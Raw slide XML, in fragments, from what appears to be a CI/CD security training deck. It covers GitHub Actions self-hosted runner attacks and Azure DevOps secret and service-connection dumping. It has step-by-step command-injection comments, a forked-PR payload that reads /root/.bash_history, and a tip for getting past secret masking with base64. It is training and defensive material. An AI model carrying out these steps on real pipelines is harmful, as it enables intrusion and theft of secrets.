            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12348139" h="10035669">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12348140" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12348140" y="10035670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10035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7782E26E-CE21-A823-5CF5-86ABD51B85C6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710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09800" y="1095375"/>
            <a:ext cx="150495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03: Self-Hosted Runner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746913"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293178"/>
          <a:ext cx="16881990" cy="7555675"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="9681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901">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3001375827"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="749852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We’ll do this whole chain from the UI.  We’ll impersonate an attacker from outside the target Organization.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First attack – command injection!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1) Log into a GitHub account you own at https://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github.com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2) Browse to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https://github.com/sharpbets/sharpbets-app-prod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3) On the ‘main’ branch, inspect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.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/workflows/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comment.yml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and look for vulnerable traits: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trigger: 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issue_comment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(no code push required to trigger – this trigger only works with default branch)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runs-on: self-hosted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(Self-hosted runner)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run: echo ${{ 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github.event.comment.body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}}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(user-controlled input passed to shell)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9B418A-5A28-483A-5F81-993980297E7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" r="30996"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9944100" y="2704822"/>
            <a:ext cx="7315200" cy="7067826"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="67573"/>
              </a:srgbClr>
            </a:solidFill>
          </a:ln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9DE9E323-445C-8037-BA37-338856852485}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11470285" y="5981700"/>
            <a:ext cx="1864715" cy="304800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D284D361-7465-914A-DFDD-4C987C01741F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11717935" y="7727122"/>
            <a:ext cx="1864715" cy="616778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2AC71347-E459-76A6-0BF3-8F1F68A1BFD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11963400" y="9144000"/>
            <a:ext cx="4572000" cy="419378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839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09800" y="1095375"/>
            <a:ext cx="150495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03: Self-Hosted Runner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888081"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293178"/>
          <a:ext cx="16881990" cy="7498520"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="8461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0101">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3001375827"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="749852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4) Go to ”Issues”, add a new comment on an issue (or create a new issue and then comment on it)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Comment content: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; &lt;command&gt;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Example: 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; id;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pwd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; ls -la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5) Go to “Actions”, observe your workflow run logs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7F174D88-3003-793C-2395-26A9943896C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9144000" y="3361070"/>
            <a:ext cx="8772250" cy="5592430"/>
            <a:chOff x="9144000" y="3361070"/>
            <a:chExt cx="7589521" cy="483842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6AD4FCE-B5FE-47B8-F168-85EFE0663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2" r="14101"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9144000" y="3361070"/>
              <a:ext cx="7589520" cy="4838424"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="71000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic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9DE9E323-445C-8037-BA37-338856852485}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12213229" y="5891177"/>
              <a:ext cx="4520292" cy="2308317"/>
            </a:xfrm>
            <a:prstGeom prst="frame">
              <a:avLst>
                <a:gd name="adj1" fmla="val 1601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3577AF4-C5B1-3A2A-F26E-9CE6E3D7E6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065" y="5747611"/>
            <a:ext cx="7756261" cy="4065782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="70555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887683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09800" y="1095375"/>
            <a:ext cx="150495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03: Self-Hosted Runner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530853"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293178"/>
          <a:ext cx="16881990" cy="7498520"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="9681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901">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3001375827"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="749852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Next one – dangerous triggers!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1) Browse to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https://github.com/sharpbets/sharpbets-app-prod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2) On the ‘prod-br-01’ branch, inspect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.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/workflows/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debug.yml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and look for vulnerable traits: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trigger: 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pull_request_trigger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(no approvals!)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runs-on: self-hosted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(Self-hosted runner)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run: bash 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start.sh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(editable script contained in same repo)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FC31926-68F2-BED5-92A8-078E92D977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3285" y="2673350"/>
            <a:ext cx="7290626" cy="7234328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9DE9E323-445C-8037-BA37-338856852485}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11574895" y="5603875"/>
            <a:ext cx="2217305" cy="419378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D284D361-7465-914A-DFDD-4C987C01741F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11734800" y="6747153"/>
            <a:ext cx="1864715" cy="616778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2AC71347-E459-76A6-0BF3-8F1F68A1BFD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11944350" y="9280663"/>
            <a:ext cx="2217305" cy="376446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18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09800" y="1095375"/>
            <a:ext cx="150495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03: Self-Hosted Runner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89468"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293178"/>
          <a:ext cx="16881990" cy="7498519"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="6404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7501">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2724886924"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="7498519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3) Go to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https://github.com/sharpbets/sharpbets-app-prod</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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Click the “Fork” button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Deselect the option to “Copy the main branch only” (our target workflow is in another branch)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6A35471-5B83-0AB4-0C09-E14A601558D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7147843" y="2524314"/>
            <a:ext cx="10100870" cy="7333877"/>
            <a:chOff x="7071367" y="2658327"/>
            <a:chExt cx="9321800" cy="67682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2E6072-CB6A-0F37-A957-344FFE471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71367" y="2658327"/>
              <a:ext cx="9321800" cy="6768222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="72000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic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D735A7BB-2A2A-14ED-59C0-0C54D5B4884D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7162800" y="7200900"/>
              <a:ext cx="2987033" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="frame">
              <a:avLst>
                <a:gd name="adj1" fmla="val 458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Frame 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21785C57-A6AC-E376-941D-F22A6555F62E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15392400" y="9177337"/>
            <a:ext cx="1531505" cy="538163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252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09800" y="1095375"/>
            <a:ext cx="150495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03: Self-Hosted Runner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906786"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293178"/>
          <a:ext cx="16881990" cy="2524379"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1688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416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4E7E7"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/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4) In your forked personal repo, switch from the “main” branch to the “prod-br-01” branch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4E7E7"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/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In the “prod-br-01” branch, click the “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4E7E7"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/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start.sh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4E7E7"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/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” file, and then click the pencil icon to edit it.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4E7E7"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/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Append the following to the end of the script, then commit the changes directly to your branch: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E7E7"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/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4E7E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sudo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4E7E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cat /root/.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4E7E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bash_history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E7E7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D9B16BF-1FFA-1E62-335B-B1E44E6AF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0024" y="5048527"/>
            <a:ext cx="14307953" cy="4822310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="70796"/>
              </a:srgbClr>
            </a:solidFill>
          </a:ln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D8705CDA-4852-2556-092D-494934C6C026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="8801100"/>
            <a:ext cx="2903105" cy="314325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AC6E27DE-78CE-3333-D0D8-2B500F941CB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14020800" y="6667500"/>
            <a:ext cx="2200976" cy="609600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666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09800" y="1095375"/>
            <a:ext cx="150495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03: Self-Hosted Runner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667567"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293178"/>
          <a:ext cx="16881989" cy="7498520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9852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5) In the “prod-br-01” branch of your personal repository, click “Contribute”, then “Open pull request”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On the Pull Request page, change the Pull Request title and Description as you see fit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Click the down arrow on the green ”Create pull request” button, change it to “Create draft pull request”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Click “Create draft pull request”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3F3FFA8-0903-CC71-2E86-4B6328AA8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751" y="4609952"/>
            <a:ext cx="9334499" cy="5432510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="68998"/>
              </a:srgbClr>
            </a:solidFill>
          </a:ln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3410D944-6770-C524-85C7-B2BAD88EDC46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10287000" y="9563099"/>
            <a:ext cx="1905000" cy="476249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906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09800" y="1095375"/>
            <a:ext cx="150495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03: Self-Hosted Runner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886254"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293178"/>
          <a:ext cx="16881989" cy="7498520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9852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6) See if your draft PR kicked off the vulnerable workflow! Navigate to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https://github.com/sharpbets/sharpbets-app-prod/actions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and look for it.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When you find your run, click the “debug” job, then click the “debug test” step to see your command output.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F6CBABC-583D-F156-E6D9-EFC4391567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3825" y="4268345"/>
            <a:ext cx="10420350" cy="5523355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="71150"/>
              </a:srgbClr>
            </a:solidFill>
          </a:ln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85DDA14B-1CA3-86A1-A40B-5AFAEA9B5D6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7533238" y="8191500"/>
            <a:ext cx="4430161" cy="160019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639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961599" y="-2782197"/>
            <a:ext cx="11098426" cy="16596766"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11098426" h="16596766">
                <a:moveTo>
                  <a:pt x="11098426" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16596766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11098426" y="16596766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28700" y="1969655"/>
            <a:ext cx="7414512" cy="5735185"/>
            <a:chOff x="0" y="-1411202"/>
            <a:chExt cx="9886015" cy="764691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411202"/>
              <a:ext cx="9243864" cy="46381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Continuous Delivery / Deployment</a:t>
              </a:r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315300" y="3913855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528662"/>
              <a:ext cx="9886015" cy="1707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Continuous Delivery Platforms</a:t>
              </a:r>
            </a:p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Azure DevOps</a:t>
              </a:r>
            </a:p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Attacking Azure DevOps to Pivot to Cloud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2402430-C3C7-892B-E6BF-ED64A51F40ED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Azure Pipelines · GitHub Marketplace · GitHub">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D7BD651-4D0A-7EB9-676C-66CD9170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579" y="322281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446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287938"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2171700"/>
          <a:ext cx="17419759" cy="8470075"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="17419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0338">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/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What is Continuous Delivery / Deployment (CD)?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Software development practice where changes in code are programmatically delivered to target application servers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Why target CD servers?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Application secrets need to exist somewhere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Live off the Land C2 server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Code execution on many servers and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critical infrastructure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Bypass network segmentation to production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environments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CD Platforms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Azure DevOps Pipelines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Gitlab CI/CD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GitHub Actions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UrbanCode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Deploy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Octopus Deploy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Atlassian Bamboo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 rot="-462696">
            <a:off x="13798841" y="8537004"/>
            <a:ext cx="6920917" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6920917" h="4114800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6920918" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6920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3733799" y="1028700"/>
            <a:ext cx="209931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Continuous Delivery / Deployment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="829761">
            <a:off x="11519704" y="5427970"/>
            <a:ext cx="3775344" cy="2244614"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3775344" h="2244614">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3775345" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3775345" y="2244614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2244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171700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D0CB3-713E-3AD7-B709-7B7B473EBDB3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CB18E2-927C-BD3D-BB9B-D6D106707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1040" y="4381500"/>
            <a:ext cx="9619649" cy="4700736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="72814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0594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9"/>
          <a:ext cx="17721445" cy="7555675"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1772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98522">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/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Azure DevOps Services / Azure DevOps Server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Services = Cloud (dev.azure.com)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Server = On-Prem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Projects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All-in-one place for developers to manage a source code repository (Repos),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track development progress, and utilize ADO’s CI/CD solution (Pipelines)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Pipelines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CI/CD solution used for application builds and deployments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Agents (Windows, Linux, macOS, Docker)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Machines used to execute Pipelines build or deployment jobs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Microsoft-hosted agents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Self-hosted agents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ADOKit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(Azure DevOps Services Attack Toolkit)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Toolkit: https://github.com/xforcered/ADOKit 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Whitepaper: https://www.ibm.com/downloads/cas/5JKAPVYD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600200" y="1095375"/>
            <a:ext cx="156591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Azure DevOps (ADO)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Azure Pipelines · GitHub Marketplace · GitHub">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B694A220-83AA-A644-1D05-503F17EE4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0" y="418382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018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00200" y="1095375"/>
            <a:ext cx="156591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Azure Pipelines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7555230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azure-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pipelines.yml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Pipeline configuration file that contains a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list of tasks for an Agent to execute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Compile application source code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Publish artifact to a file share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Transfer application package files to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production server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Resides in the application’s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code repository with application code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YAML configuration per branch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Execute arbitrary shell scripts on Agents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Bash, Batch, PowerShell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Classic Editor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Legacy interface to configure Pipelines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Stealthier method of creating malicious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Pipelines, no changes to git repo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E23F150-9E8A-4434-2E48-B2FDA9A61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2507" y="3361070"/>
            <a:ext cx="10178182" cy="5761501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="7118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4229421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4800600" y="1095375"/>
            <a:ext cx="220599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Dumping Secret Variables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66412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Variables &amp; Secret Variables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All variables are strings that can be defined for a Pipeline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Secret variables are protected values that will be masked if found in a job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output log. Cannot be viewed in the web interface.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Secret Variables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ADO performs an exact string match search in the job output log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looking for secret values and then masking them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Like most CI/CD platforms, this can be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easily bypassed by performing any type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of string manipulation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e.g., encryption, base64 encoding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Variable Groups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Shared Variables within a Project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Link Azure Key Vault secrets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E811072-7AAD-498A-BEAA-711BEBB8AD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2058" y="5909398"/>
            <a:ext cx="10626698" cy="2510702"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="74000"/>
              </a:srgb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54D028-9A5D-F159-1724-C9FC8CCB5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9741" y="8704115"/>
            <a:ext cx="11539015" cy="10875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F2DDC7-894A-DD0C-03FD-6D8F699809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58800" y="2545708"/>
            <a:ext cx="3505200" cy="3054992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="74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539735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00200" y="1095375"/>
            <a:ext cx="156591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Service Connections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52696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Credentials for external services, which are configured at the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Project level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Service Connections are used by Pipelines to interact with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external services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Configure Azure services using Infrastructure-as-Code (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IaC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)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Virtual machines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Kubernetes (AKS)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Big data pipelines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Retrieve a secret from an Azure Key Vault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Fetch source code stored in a private GitHub repository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Download a compiled artifact from Jenkins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6F9132E-767B-6312-B689-58CA249F28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74895" y="2548755"/>
            <a:ext cx="5905500" cy="7394176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="75241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4158755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61975" y="3496467"/>
            <a:ext cx="6690444" cy="2475104"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8920591" cy="3300138"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="57150"/>
              <a:ext cx="8920591" cy="284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780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DevOps in the Real World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3170188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0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5497916" y="129950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rot="-990888" flipV="1">
            <a:off x="507868" y="-1653295"/>
            <a:ext cx="10372410" cy="3752926"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10372410" h="3752926">
                <a:moveTo>
                  <a:pt x="0" y="3752926"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10372409" y="3752926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10372409" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3752926"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5">
              <a:alphaModFix amt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9955175" flipV="1">
            <a:off x="1734305" y="8697504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7">
              <a:alphaModFix amt="6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987853"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7866666" y="858768"/>
          <a:ext cx="10177587" cy="9306384"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="10177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Plan and document projects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Write the code and store it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5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Build the software &amp; test </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="25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</a:rPr>
                        <a:t>it</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="25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Create infrastructure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Deploy software to infra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Configure and troubleshoot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Monitor apps &amp; infra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Don’t expose secrets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AutoShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7866666" y="858768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7866666" y="1998111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7866666" y="3194154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7866666" y="4364234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7866666" y="5531644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7866666" y="6664321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7866666" y="7820887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7866666" y="8997486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561975" y="6076823"/>
            <a:ext cx="6690444" cy="252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Does your organization create software? It probably follows a model similar to this.</a:t>
            </a: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F4E7E7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Automation and maturity levels vary, and with that complexity changes.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F4E7E7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908B90-4441-F03C-E0C7-F23B4524DF33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Azure Resource Manager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66412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Common Service Connection type used to access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resources in Azure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Service Principal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Tied to an App Registration in Azure. Must manage a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client secret.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Workload Identity Federation (ADO Services feature)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Replacement for Service Principals in Azure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“Secret-less”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Uses OpenID Connect (OIDC) to grant a Pipeline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access to Azure resources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ADO is the identity provider (IdP) that produces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the client assertion JSON web token (JWT) to be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used by a Pipeline. This JWT is presented to Azure,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resulting in access to resources in Azure.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E75B866-021B-AF86-5323-E736F29A84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1881" y="2628900"/>
            <a:ext cx="8488808" cy="6844100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="69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9314311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4800600" y="1095375"/>
            <a:ext cx="220599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Workload Identity Federation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7682089" cy="8012875"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="17682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JWT returned in Step 1 is traded for an Entra ID access token in Steps 2-4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2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az</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="22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 login --service-principal -u [SERVICE_PRINCIPAL_ID] --tenant [TENANT_ID] --federated-token [JWT]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Entra ID access token’s lifetime is 24 hours</a:t>
                      </a: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194" name="Picture 2" descr="Image oidc collaboration">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{242C8358-8E84-E91B-94EF-629240FC4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7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2400300" y="4136946"/>
            <a:ext cx="13487400" cy="6024086"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="69505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259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70984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“Grant access permission to all pipelines” – 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DON’T DO THIS!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Even if Microsoft docs tell you to...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 malicious user with access to a development Pipeline could import and dump a production Service Connection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https://learn.microsoft.com/en-gb/azure/devops/pipelines/library/connect-to-azure?view=azure-devops#create-a-service-connection-with-workload-identity-federation-automatic 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-228600" y="1095375"/>
            <a:ext cx="174879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Service Connection Security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CD21B-AAD3-A791-F8BF-C881CE8D6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50" y="7225582"/>
            <a:ext cx="8839200" cy="1742496"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="71000"/>
              </a:srgb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AC2885-79E3-CFE0-F35D-84E33A52EF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6450" y="5039406"/>
            <a:ext cx="14175100" cy="178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05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4800600" y="1095375"/>
            <a:ext cx="220599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Dumping Service Connections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988432"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="377311" y="2293177"/>
          <a:ext cx="16881989" cy="75556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 panose="020B0604020202020204" charset="0"/>
                          <a:ea typeface="Telegraf"/>
                          <a:cs typeface="Telegraf"/>
                          <a:sym typeface="Telegraf"/>
                        </a:rPr>
                        <a:t>Azure CLI Task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 panose="020B0604020202020204" charset="0"/>
                          <a:ea typeface="Telegraf"/>
